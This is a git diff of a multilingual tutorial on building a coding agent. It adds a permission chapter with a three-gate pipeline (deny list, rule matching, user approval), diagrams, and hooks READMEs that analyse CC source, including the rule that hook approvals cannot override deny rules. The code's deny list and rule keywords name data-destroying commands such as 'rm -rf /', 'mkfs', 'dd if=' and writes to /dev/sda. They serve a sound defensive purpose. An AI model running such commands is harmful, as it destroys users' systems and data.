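第二节第 8 步的 passthrough → ask 转换,本质是一条默认安全策略:拿不准就问。用一个极简草图示意(假设示例,非 CC 实现):

```python
def resolve(behavior: str) -> str:
    # allow / deny 是明确表态,原样通过;其余一律转为询问
    if behavior in ("allow", "deny"):
        return behavior
    return "ask"  # passthrough(工具不表态)默认转为 ask

assert resolve("allow") == "allow"
assert resolve("deny") == "deny"
assert resolve("ask") == "ask"
assert resolve("passthrough") == "ask"
```

换句话说,管线里任何一环"不表态"都不会导致静默放行,而是落到人工确认这条保底路径上。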
+ + diff --git a/s03_permission/code.py b/s03_permission/code.py new file mode 100644 index 000000000..679f194d5 --- /dev/null +++ b/s03_permission/code.py @@ -0,0 +1,248 @@ +#!/usr/bin/env python3 +""" +s03_permission.py - Permission System + +Three gates inserted before tool execution: + + Gate 1: Hard deny list (rm -rf /, sudo, ...) + Gate 2: Rule matching (write outside workspace? destructive cmd?) + Gate 3: User approval (pause and wait for confirmation) + + +-------+ +--------+ +--------+ +--------+ +------+ + | Tool | -> | Gate 1 | -> | Gate 2 | -> | Gate 3 | -> | Exec | + | call | | deny? | | match? | | allow? | | | + +-------+ +--------+ +--------+ +--------+ +------+ + | | | | + v v v v + (normal) (blocked) (ask user) (user says no?) + +Only one line added to the agent loop: + + if not check_permission(block): + continue + +Builds on s02 (multi-tool). Usage: + + python s03_permission/code.py + Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') + readline.parse_and_bind('set input-meta on') + readline.parse_and_bind('set output-meta on') + readline.parse_and_bind('set convert-meta off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. All destructive operations require user approval." 
+ + +# ═══════════════════════════════════════════════════════════ +# FROM s02 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# FROM s02 (unchanged): Tool Definitions & Dispatch +# ═══════════════════════════════════════════════════════════ + +TOOLS = [ + {"name": "bash", 
"description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, +} + + +# ═══════════════════════════════════════════════════════════ +# NEW in s03: Three-Gate Permission Pipeline +# ═══════════════════════════════════════════════════════════ + +# Gate 1: Hard deny list — always forbidden +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if=", "> /dev/sda"] + +def check_deny_list(command: str) -> str | None: + for pattern in DENY_LIST: + if pattern in command: + return f"Blocked: '{pattern}' is on the deny list" + return None + + +# Gate 2: Rule matching — context-dependent checks +PERMISSION_RULES = [ + {"tools": ["write_file", "edit_file"], + "check": lambda args: not str(args.get("path", "")).startswith(str(WORKDIR)), + "message": "Writing outside workspace"}, + {"tools": ["bash"], + "check": lambda args: any(kw in args.get("command", "") for kw in ["rm ", "> /etc/", "chmod 
777"]), + "message": "Potentially destructive command"}, +] + +def check_rules(tool_name: str, args: dict) -> str | None: + for rule in PERMISSION_RULES: + if tool_name in rule["tools"] and rule["check"](args): + return rule["message"] + return None + + +# Gate 3: User approval — wait for confirmation after rule match +def ask_user(tool_name: str, args: dict, reason: str) -> str: + print(f"\n\033[33m⚠ {reason}\033[0m") + print(f" Tool: {tool_name}({args})") + choice = input(" Allow? [y/N] ").strip().lower() + return "allow" if choice in ("y", "yes") else "deny" + + +# Pipeline: all three gates chained +def check_permission(block) -> bool: + if block.name == "bash": + reason = check_deny_list(block.input.get("command", "")) + if reason: + print(f"\n\033[31m⛔ {reason}\033[0m") + return False + reason = check_rules(block.name, block.input) + if reason: + decision = ask_user(block.name, block.input, reason) + if decision == "deny": + return False + return True + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — same as s02, with check_permission() inserted +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + print(f"\033[36m> {block.name}\033[0m") + + # s03 change: run through permission pipeline before executing + if not check_permission(block): + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": "Permission denied."}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", 
"tool_use_id": block.id, "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s03: Permission") + print("输入问题,回车发送。输入 q 退出。\n") + + history = [] + while True: + try: + query = input("\033[36ms03 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s03_permission/images/permission-overview.en.svg b/s03_permission/images/permission-overview.en.svg new file mode 100644 index 000000000..9ea96e536 --- /dev/null +++ b/s03_permission/images/permission-overview.en.svg @@ -0,0 +1,58 @@ + + + + + + + + + + + + + + Permission Pipeline — Three Gates + + + + Tool call enters + + + + + + Gate 1: Deny List + rm -rf /, sudo, shutdown + + + + + + Gate 2: Rule Matching + Write outside ws? Destructive? + + + + + + Allow + or ask user + + + + Three Decisions + + + Deny + Gate 1 matched, blocked + + + Ask + Gate 2 matched, ask user + + + Allow + All passed, execute + + Priority: Gate 1 (hard deny) → Gate 2 (soft ask) → unmatched defaults to allow + diff --git a/s03_permission/images/permission-overview.ja.svg b/s03_permission/images/permission-overview.ja.svg new file mode 100644 index 000000000..b397b8ce9 --- /dev/null +++ b/s03_permission/images/permission-overview.ja.svg @@ -0,0 +1,58 @@ + + + + + + + + + + + + + + Permission Pipeline — 3 つのゲート + + + + ツール呼び出し + + + + + + ゲート 1: 拒否リスト + rm -rf /, sudo, shutdown + + + + + + ゲート 2: ルール照合 + ws 外への書き込み?破壊的? 
+ + + + + + 許可 + またはユーザー承認 + + + + 3 つの決定 + + + 拒否 (deny) + ゲート 1 一致、即座に拒否 + + + 確認 (ask) + ゲート 2 一致、ユーザー確認待ち + + + 許可 (allow) + すべて通過、直接実行 + + 優先順位:ゲート 1(ハード拒否)→ ゲート 2(ソフト確認)→ 一致しない場合はデフォルトで許可 + diff --git a/s03_permission/images/permission-overview.svg b/s03_permission/images/permission-overview.svg new file mode 100644 index 000000000..91bc020e8 --- /dev/null +++ b/s03_permission/images/permission-overview.svg @@ -0,0 +1,97 @@ + + + + + + + + + + + + + + + + + + + + + + + + Permission — 循环不变,工具执行前加一道门 + + + s02 保留 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + + + + 返回结果 + + + + + + + s03 新增 + + + + check_permission() + + + + 闸门 1: 拒绝列表 + + + + 闸门 2: 规则匹配 + + + + 闸门 3: 用户审批 + + + + 拒绝 + + + + 通过 + + + s02 + + + + TOOL_ + HANDLERS + bash/read/write/... + + + + + + + + s02 保留(循环、LLM、分发——完全不变) + + s03 新增(三道闸门权限管线) + diff --git a/s03_permission/images/permission-pipeline.en.svg b/s03_permission/images/permission-pipeline.en.svg new file mode 100644 index 000000000..b61586823 --- /dev/null +++ b/s03_permission/images/permission-pipeline.en.svg @@ -0,0 +1,97 @@ + + + + + + + + + + + + + + + + + + + + + + + + Permission — Loop unchanged, a gate before tool execution + + + s02 preserved + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + + Return result + + + + Yes + + + s03 new + + + + check_permission() + + + + Gate 1: Deny List + + + + Gate 2: Rule Matching + + + + Gate 3: User Approval + + + + Deny + + + + Pass + + + s02 + + + + TOOL_ + HANDLERS + bash/read/write/... 
+ + + + + + + + s02 preserved (loop, LLM, dispatch — unchanged) + + s03 new (three-gate permission pipeline) + diff --git a/s03_permission/images/permission-pipeline.ja.svg b/s03_permission/images/permission-pipeline.ja.svg new file mode 100644 index 000000000..38dbe3424 --- /dev/null +++ b/s03_permission/images/permission-pipeline.ja.svg @@ -0,0 +1,97 @@ + + + + + + + + + + + + + + + + + + + + + + + + Permission — ループは変更なし、ツール実行前にゲートを追加 + + + s02 維持 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + + 結果を返す + + + + Yes + + + s03 新規 + + + + check_permission() + + + + ゲート 1: 拒否リスト + + + + ゲート 2: ルール照合 + + + + ゲート 3: ユーザー承認 + + + + 拒否 + + + + 通過 + + + s02 + + + + TOOL_ + HANDLERS + bash/read/write/... + + + + + + + + s02 維持(ループ、LLM、ディスパッチ — 変更なし) + + s03 新規(3 ゲート権限パイプライン) + diff --git a/s03_permission/images/permission-pipeline.svg b/s03_permission/images/permission-pipeline.svg new file mode 100644 index 000000000..121cacb79 --- /dev/null +++ b/s03_permission/images/permission-pipeline.svg @@ -0,0 +1,58 @@ + + + + + + + + + + + + + + Permission Pipeline — 三道闸门 + + + + 工具调用进入 + + + + + + 闸门 1: 拒绝列表 + rm -rf /, sudo, shutdown + + + + + + 闸门 2: 规则匹配 + 写工作区外?读敏感路径? + + + + + + 允许执行 + 或需用户审批 + + + + 三种决策 + + + 阻止 (deny) + 闸门 1 命中,直接拒绝 + + + 询问 (ask) + 闸门 2 命中,等用户确认 + + + 允许 (allow) + 全部通过,直接执行 + + 规则优先:闸门 1(硬拒绝)→ 闸门 2(软询问)→ 不匹配的默认允许 + diff --git a/s04_hooks/README.en.md b/s04_hooks/README.en.md new file mode 100644 index 000000000..dd5fb7c4c --- /dev/null +++ b/s04_hooks/README.en.md @@ -0,0 +1,280 @@ +# s04: Hooks — Hang on the Loop, Don't Write into It + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → `s04` → [s05](../s05_todo_write/) → s06 → ... → s19 + +> *"Hang on the loop, don't write into it"* — Hooks inject extension logic before and after tool execution. +> +> **Harness Layer**: Hooks — Extension points that don't invade the loop. + +--- + +## The Problem + +The s03 Agent has permission checks. 
But every new check — "log every bash call", "auto git add after writes" — requires modifying the `agent_loop` function. + +The loop quickly becomes this: + +```python +def agent_loop(messages): + while True: + # ... LLM call ... + for block in response.content: + if block.type == "tool_use": + log_to_file(block) # added a line + check_permission(block) # added a line + notify_slack(block) # added another line + output = execute(block) + auto_git_add(block) # yet another line + # ... the loop is unrecognizable +``` + +What you want to extend is the Agent's behavior, but what you're modifying is the loop itself. The loop should be a stable core — extensions should hang on the outside. + +--- + +## The Solution + +![Hooks Overview](images/hooks-overview.en.svg) + +The s03 loop and permission logic are fully preserved. The only change is moving `check_permission()` from inside the loop body onto a hook — the loop no longer directly calls any check function. Instead it calls `trigger_hooks("PreToolUse", block)`, and the registry decides what to run. + +Four events, covering a complete agent cycle: + +| Event | Trigger Timing | Typical Use | +|-------|---------------|-------------| +| UserPromptSubmit | After user input, before entering LLM | Input validation, context injection | +| PreToolUse | Before tool execution | Permission checks, logging | +| PostToolUse | After tool execution | Auto git add, result post-processing | +| Stop | When the loop is about to exit | Force continuation, cleanup | + +Adding an extension = `register_hook()`. The loop doesn't change. 
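To make the "extensions hang on the outside" claim concrete, here is what adding the auto-git-add extension from the table above could look like. The registry shape matches this chapter; `auto_git_add_hook` itself is a hypothetical extension, not part of the chapter's code:

```python
from types import SimpleNamespace
import subprocess

# Minimal registry, same shape as the one this chapter builds
HOOKS = {"PreToolUse": [], "PostToolUse": []}

def register_hook(event, callback):
    HOOKS[event].append(callback)

def trigger_hooks(event, *args):
    for cb in HOOKS[event]:
        result = cb(*args)
        if result is not None:
            return result
    return None

# Hypothetical extension: stage files after every successful write
def auto_git_add_hook(block, output):
    if block.name in ("write_file", "edit_file") and not str(output).startswith("Error"):
        try:
            subprocess.run(["git", "add", block.input.get("path", ".")],
                           capture_output=True, check=False)
        except FileNotFoundError:
            pass  # no git installed: skip silently in this sketch

register_hook("PostToolUse", auto_git_add_hook)

# The loop's call site never changes: trigger_hooks("PostToolUse", block, output)
fake_block = SimpleNamespace(name="write_file", input={"path": "notes.txt"})
trigger_hooks("PostToolUse", fake_block, "Wrote 12 bytes to notes.txt")
```

Removing the extension is equally non-invasive: delete the `register_hook` line, and the loop is untouched.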
+ +--- + +## How It Works + +**Hook registry** — a dict mapping event names to callback lists: + +```python +HOOKS = { + "UserPromptSubmit": [], + "PreToolUse": [], + "PostToolUse": [], + "Stop": [], +} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: # return value ≠ None → hook says "stop" + return result + return None +``` + +**UserPromptSubmit** — triggers after user input, before entering the LLM. Can inject context or intercept input: + +```python +def context_inject_hook(query: str) -> str | None: + """Inject current working directory info into every prompt.""" + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None # return None = no modification, let prompt through + +register_hook("UserPromptSubmit", context_inject_hook) +``` + +In the main loop, triggered right after user input: + +```python +query = input("s04 >> ") +trigger_hooks("UserPromptSubmit", query) # ← before entering LLM +history.append({"role": "user", "content": query}) +agent_loop(history) +``` + +**PreToolUse / PostToolUse** — hooks before and after tool execution. s03's permission check logic is now wrapped as a PreToolUse hook, plus a logging hook and a large-output reminder: + +```python +# PreToolUse: permission check (s03 logic, moved from loop to hook) +def permission_hook(block): + if block.name == "bash": + for pattern in DENY_LIST: + if pattern in block.input.get("command", ""): + return "Permission denied by deny list" + if block.name in ("write_file", "edit_file"): + path = block.input.get("path", "") + if not path.startswith(str(WORKDIR)): + choice = input(" Allow? 
[y/N] ").strip().lower() + if choice not in ("y", "yes"): + return "Permission denied by user" + return None + +# PreToolUse: logging +def log_hook(block): + print(f"[HOOK] {block.name}(...)") + +# PostToolUse: large output reminder +def large_output_hook(block, output): + if len(str(output)) > 100000: + print(f"[HOOK] ⚠ Large output from {block.name}") + +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("PostToolUse", large_output_hook) +``` + +**Stop** — triggers when the loop is about to exit (`stop_reason != "tool_use"`). Can prevent exit, force continuation, or do cleanup: + +```python +def summary_hook(messages: list) -> str | None: + """Print a summary when the loop is about to stop.""" + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None # return None = allow stop, return string = force continuation + +register_hook("Stop", summary_hook) +``` + +In agent_loop, triggered before exit: + +```python +if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) # ← before exiting + if force: + # hook returned a message → inject it and continue + messages.append({"role": "user", "content": force}) + continue + return +``` + +**Only one change in the loop** — s03 directly called `check_permission(block)`, s04 replaces it with `trigger_hooks("PreToolUse", block)`: + +```python +for block in response.content: + if block.type != "tool_use": + continue + + # s03: if not check_permission(block): ... 
+ # s04: hooks replace hardcoding + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) +``` + +Four hooks cover every critical node of the agent cycle: input → before execution → after execution → exit. The loop itself stays clean forever. + +--- + +## Changes from s03 + +| Component | Before (s03) | After (s04) | +|-----------|-------------|-------------| +| Extension method | check_permission() hardcoded in the loop | HOOKS registry + trigger_hooks() | +| New functions | — | register_hook, trigger_hooks | +| Hook callbacks | — | context_inject_hook, permission_hook, log_hook, large_output_hook, summary_hook | +| Loop | Directly calls check_permission() | Calls trigger_hooks("PreToolUse", ...) | +| Exit control | None | trigger_hooks("Stop", ...) can prevent exit | +| Input interception | None | trigger_hooks("UserPromptSubmit", ...) can inject context | + +--- + +## Try It + +```sh +cd learn-claude-code +python s04_hooks/code.py +``` + +Try these prompts: + +1. `Read the file README.md` (should pass directly — observe hook logs) +2. `Create a file called test.txt` (after creation, observe if PostToolUse fires) +3. `Delete all temporary files in /tmp` (bash + rm triggers permission hook) + +What to watch for: Before each tool execution, does the `[HOOK]` log appear? When permission is denied, was it intercepted by a hook or hardcoded in the loop? + +--- + +## What's Next + +The Agent can now safely execute operations. But does it ever stop to think "what should I do first, and what next?" Given a complex task, does it charge in blindly, or plan first? 
+ +→ s05 TodoWrite: Give the Agent a planning tool. Make a list first, then execute. Completion rate doubles. + +
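Before moving on, the Stop contract (return None to allow exit, return a string to force another round) can be tested without a live loop. A minimal sketch with a hypothetical `require_write_hook`; the string-matching check on message history is illustrative only:

```python
HOOKS = {"Stop": []}

def register_hook(event, callback):
    HOOKS[event].append(callback)

def trigger_hooks(event, *args):
    for cb in HOOKS[event]:
        result = cb(*args)
        if result is not None:
            return result
    return None

# Hypothetical Stop hook: refuse to stop until some write_file call appears in history
def require_write_hook(messages):
    if any("write_file" in str(m) for m in messages):
        return None  # None → allow the loop to stop
    return "No file was written yet. Please finish the task before stopping."

register_hook("Stop", require_write_hook)

# No write yet → the hook returns a message; the loop would inject it and continue
force = trigger_hooks("Stop", [{"role": "user", "content": "create notes.txt"}])
assert force is not None
```

The returned string becomes a new user message in `agent_loop`, so the model sees the objection and gets one more chance to act on it.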
+Dive into CC Source Code

> The following is based on a complete analysis of CC source code `toolHooks.ts` (650 lines), `hooks.ts`, `stopHooks.ts`, and `coreTypes.ts`.

### 1. Hook Events: Not 4, but 27

The teaching version covers only four events. CC actually has 27 hook events (`coreTypes.ts:25-53`):

| Category | Events |
|----------|--------|
| Tool-related | `PreToolUse`, `PostToolUse`, `PostToolUseFailure` |
| Session-related | `SessionStart`, `SessionEnd`, `Stop`, `StopFailure`, `Setup` |
| User interaction | `UserPromptSubmit`, `Notification`, `PermissionRequest`, `PermissionDenied` |
| Sub-agents | `SubagentStart`, `SubagentStop` |
| Compaction-related | `PreCompact`, `PostCompact` |
| Team-related | `TeammateIdle`, `TaskCreated`, `TaskCompleted` |
| Other | `Elicitation`, `ElicitationResult`, `ConfigChange`, `WorktreeCreate`, `WorktreeRemove`, `InstructionsLoaded`, `CwdChanged`, `FileChanged` |

The teaching version keeps only 4 core events (UserPromptSubmit, PreToolUse, PostToolUse, Stop) because they cover every critical node of a complete agent cycle. The other 23 follow the same pattern.

### 2. HookResult Complete Fields

CC's `HookResult` (`types/hooks.ts:260-275`) has 13 fields; the key ones:

| Field | Type | Purpose |
|-------|------|---------|
| `message` | Message | Optional UI message |
| `blockingError` | HookBlockingError | Blocking error → injected into conversation for model self-correction |
| `outcome` | success/blocking/non_blocking_error/cancelled | Execution result |
| `preventContinuation` | boolean | Prevent subsequent execution |
| `stopReason` | string | Stop reason description |
| `permissionBehavior` | allow/deny/ask/passthrough | Hook returns permission decision |
| `updatedInput` | Record | Modify tool input |
| `additionalContext` | string | Additional context |
| `updatedMCPToolOutput` | unknown | MCP tool output modification |

### 3. Key Invariant: Hook 'allow' Cannot Bypass deny/ask Rules

This is the most important security design in CC's permission system (`toolHooks.ts:325-331`): **when a hook returns allow, it still checks settings.json deny/ask rules.** Even if the user's hook script says "allow", if the tool is disabled in settings.json, the operation is still blocked.

The teaching version doesn't have this layer — hooks returning non-None directly interrupt. This is sufficient for teaching, but would create a security vulnerability in production.

### 4. stopHookActive Mechanism

CC's Stop hooks have an infinite-loop prevention mechanism (`query.ts:212,1300`): the `stopHookActive` state field. When stop hooks produce a blockingError, the loop re-enters with `stopHookActive: true`. Subsequent iterations see this flag and don't trigger stop hooks again. This prevents a never-stopping bug — model self-corrects → stop hook errors again → model self-corrects again → stop hook errors again...

### 5. hook_stopped_continuation

When PostToolUse hooks return `preventContinuation: true`, a `hook_stopped_continuation` attachment is produced (`toolHooks.ts:117-130`). query.ts (L1388-1393) detects it and sets `shouldPreventContinuation = true`, causing the loop to exit. This is the mechanism for "hooks gracefully shut down the Agent" — not a crash, but a completion.

### Teaching Version Simplifications Are Intentional

- 27 events → 4 (UserPromptSubmit/PreToolUse/PostToolUse/Stop): covers agent cycle critical nodes
- 13 fields → simple return values (None = continue; non-None = interrupt for PreToolUse, force-continue for Stop): minimal cognitive load
- Hook allow vs deny/ask invariant → omitted: teaching version has no settings.json layer
- stopHookActive → omitted: teaching version Stop hook only does simple continuation, no infinite-loop prevention needed

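The `stopHookActive` guard described in §4 reduces to a single state flag. A minimal re-creation (the fake response dict and always-blocking hook are assumptions for illustration, not CC's code):

```python
def run_loop(next_response, stop_hook):
    state = {"stopHookActive": False}
    while True:
        response = next_response()
        if response["stop_reason"] != "tool_use":
            if not state["stopHookActive"] and stop_hook() is not None:
                state["stopHookActive"] = True  # remember: don't consult stop hooks again
                continue                        # one self-correction round, then exit
            return "stopped"

calls = {"n": 0}

def always_blocking_hook():
    calls["n"] += 1
    return "blocking error"  # a hook that always objects to stopping

assert run_loop(lambda: {"stop_reason": "end_turn"}, always_blocking_hook) == "stopped"
assert calls["n"] == 1  # the flag granted exactly one extra round, then forced exit
```

Without the flag, an always-objecting hook would trap the loop forever; with it, the hook gets one shot at triggering self-correction.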
+ + diff --git a/s04_hooks/README.ja.md b/s04_hooks/README.ja.md new file mode 100644 index 000000000..b25403a80 --- /dev/null +++ b/s04_hooks/README.ja.md @@ -0,0 +1,280 @@ +# s04: Hooks — ループに掛ける、ループには書き込まない + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → `s04` → [s05](../s05_todo_write/) → s06 → ... → s19 + +> *"ループに掛ける、ループには書き込まない"* — フックがツール実行の前後に拡張ロジックを注入する。 +> +> **Harness レイヤー**: フック — ループを侵襲しない拡張ポイント。 + +--- + +## 課題 + +s03 の Agent には権限チェックがある。しかし新しいチェックを追加するたび — 「bash 呼び出しを毎回ログに記録」「操作後に自動 git add」— `agent_loop` 関数を修正する必要がある。 + +ループはすぐにこうなる: + +```python +def agent_loop(messages): + while True: + # ... LLM call ... + for block in response.content: + if block.type == "tool_use": + log_to_file(block) # 一行追加 + check_permission(block) # 一行追加 + notify_slack(block) # さらに一行追加 + output = execute(block) + auto_git_add(block) # さらに一行追加 + # ... もうループが見えない +``` + +拡張したいのは Agent の振る舞いなのに、変更しているのはループそのもの。ループは安定した核心であるべき — 拡張は外側に掛ける。 + +--- + +## ソリューション + +![Hooks Overview](images/hooks-overview.ja.svg) + +s03 のループと権限ロジックは完全に保持される。唯一の変更点は `check_permission()` をループ本体内からフックに移動したこと — ループはもうチェック関数を直接呼び出さず、代わりに `trigger_hooks("PreToolUse", block)` を呼び、登録済みのフックが何を実行するかを決める。 + +4 つのイベントで、完全な agent cycle をカバー: + +| イベント | 発火タイミング | 典型的な用途 | +|----------|--------------|-------------| +| UserPromptSubmit | ユーザー入力後、LLM に入る前 | 入力バリデーション、コンテキスト注入 | +| PreToolUse | ツール実行前 | 権限チェック、ログ記録 | +| PostToolUse | ツール実行後 | 自動 git add、結果の後処理 | +| Stop | ループが終了する直前 | 強制続行、クリーンアップ | + +拡張の追加 = `register_hook()`。ループは変わらない。 + +--- + +## 仕組み + +**フック登録簿** — イベント名をコールバックリストにマッピングする辞書: + +```python +HOOKS = { + "UserPromptSubmit": [], + "PreToolUse": [], + "PostToolUse": [], + "Stop": [], +} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: # 戻り値 ≠ None → フックが「止め」と指示 + return result + return None +``` + 
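このレジストリの重要な性質は「最初に非 None を返したフックで打ち切られ、後続のフックは実行されない」こと。以下は本文のレジストリを抜き出した最小デモ(フック関数はこの例のための仮のもの):

```python
# 本文と同じ最小レジストリ(抜粋)。フック関数は説明用の仮のもの。
HOOKS = {"PreToolUse": []}

def register_hook(event, callback):
    HOOKS[event].append(callback)

def trigger_hooks(event, *args):
    for callback in HOOKS[event]:
        result = callback(*args)
        if result is not None:  # 最初の非 None で打ち切り
            return result
    return None

calls = []

def audit_hook(command):
    calls.append("audit")
    return None                 # None = 続行

def deny_hook(command):
    calls.append("deny")
    if "rm -rf" in command:
        return "Permission denied"
    return None

def never_reached_hook(command):
    calls.append("late")
    return None

register_hook("PreToolUse", audit_hook)
register_hook("PreToolUse", deny_hook)
register_hook("PreToolUse", never_reached_hook)

print(trigger_hooks("PreToolUse", "rm -rf build"))  # → Permission denied
print(calls)  # → ['audit', 'deny'](deny_hook で打ち切られ、never_reached_hook は呼ばれない)
```

つまり登録順がそのまま優先順位になる。permission_hook を log_hook より先に登録すると、ブロックされた呼び出しは log_hook に届かない点に注意。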
+
+**UserPromptSubmit** — ユーザー入力後、LLM に入る前に発火。コンテキストの注入や入力の横取りが可能:
+
+```python
+def context_inject_hook(query: str) -> str | None:
+    """Log the current working directory before each prompt reaches the LLM."""
+    print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m")
+    return None  # return None = 変更なし、プロンプトを通す
+
+register_hook("UserPromptSubmit", context_inject_hook)
+```
+
+メインループでは、ユーザー入力直後に発火:
+
+```python
+query = input("s04 >> ")
+trigger_hooks("UserPromptSubmit", query)  # ← LLM に入る前
+history.append({"role": "user", "content": query})
+agent_loop(history)
+```
+
+**PreToolUse / PostToolUse** — ツール実行の前後のフック。s03 の権限チェックロジックは PreToolUse フックに包まれ、さらにログフックと大出力リマインダーが追加される:
+
+```python
+# PreToolUse: 権限チェック(s03 のロジック、ループからフックに移動)
+def permission_hook(block):
+    if block.name == "bash":
+        for pattern in DENY_LIST:
+            if pattern in block.input.get("command", ""):
+                return "Permission denied by deny list"
+    if block.name in ("write_file", "edit_file"):
+        path = block.input.get("path", "")
+        if not path.startswith(str(WORKDIR)):
+            choice = input("  Allow? [y/N] ").strip().lower()
+            if choice not in ("y", "yes"):
+                return "Permission denied by user"
+    return None
+
+# PreToolUse: ログ
+def log_hook(block):
+    print(f"[HOOK] {block.name}(...)")
+
+# PostToolUse: 大ファイルリマインダー
+def large_output_hook(block, output):
+    if len(str(output)) > 100000:
+        print(f"[HOOK] ⚠ Large output from {block.name}")
+
+register_hook("PreToolUse", permission_hook)
+register_hook("PreToolUse", log_hook)
+register_hook("PostToolUse", large_output_hook)
+```
+
+**Stop** — ループが終了する直前に発火(`stop_reason != "tool_use"`)。終了を阻止、強制続行、またはクリーンアップが可能:
+
+```python
+def summary_hook(messages: list) -> str | None:
+    """Print a summary when the loop is about to stop."""
+    tool_count = sum(1 for m in messages
+                     for b in (m.get("content") if isinstance(m.get("content"), list) else [])
+                     if isinstance(b, dict) and b.get("type") == "tool_result")
+    print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m")
+    return None  # return None = 終了を許可、return 文字列 = 強制続行
+
+register_hook("Stop", summary_hook)
+```
+
+agent_loop 内では、終了前に発火:
+
+```python
+if response.stop_reason != "tool_use":
+    force = trigger_hooks("Stop", messages)  # ← 終了する前に
+    if force:
+        # フックがメッセージを返した → 注入して続行
+        messages.append({"role": "user", "content": force})
+        continue
+    return
+```
+
+**ループ内で変更されたのは一箇所だけ** — s03 は直接 `check_permission(block)` を呼び出していたが、s04 は `trigger_hooks("PreToolUse", block)` に置き換えた:
+
+```python
+for block in response.content:
+    if block.type != "tool_use":
+        continue
+
+    # s03: if not check_permission(block): ...
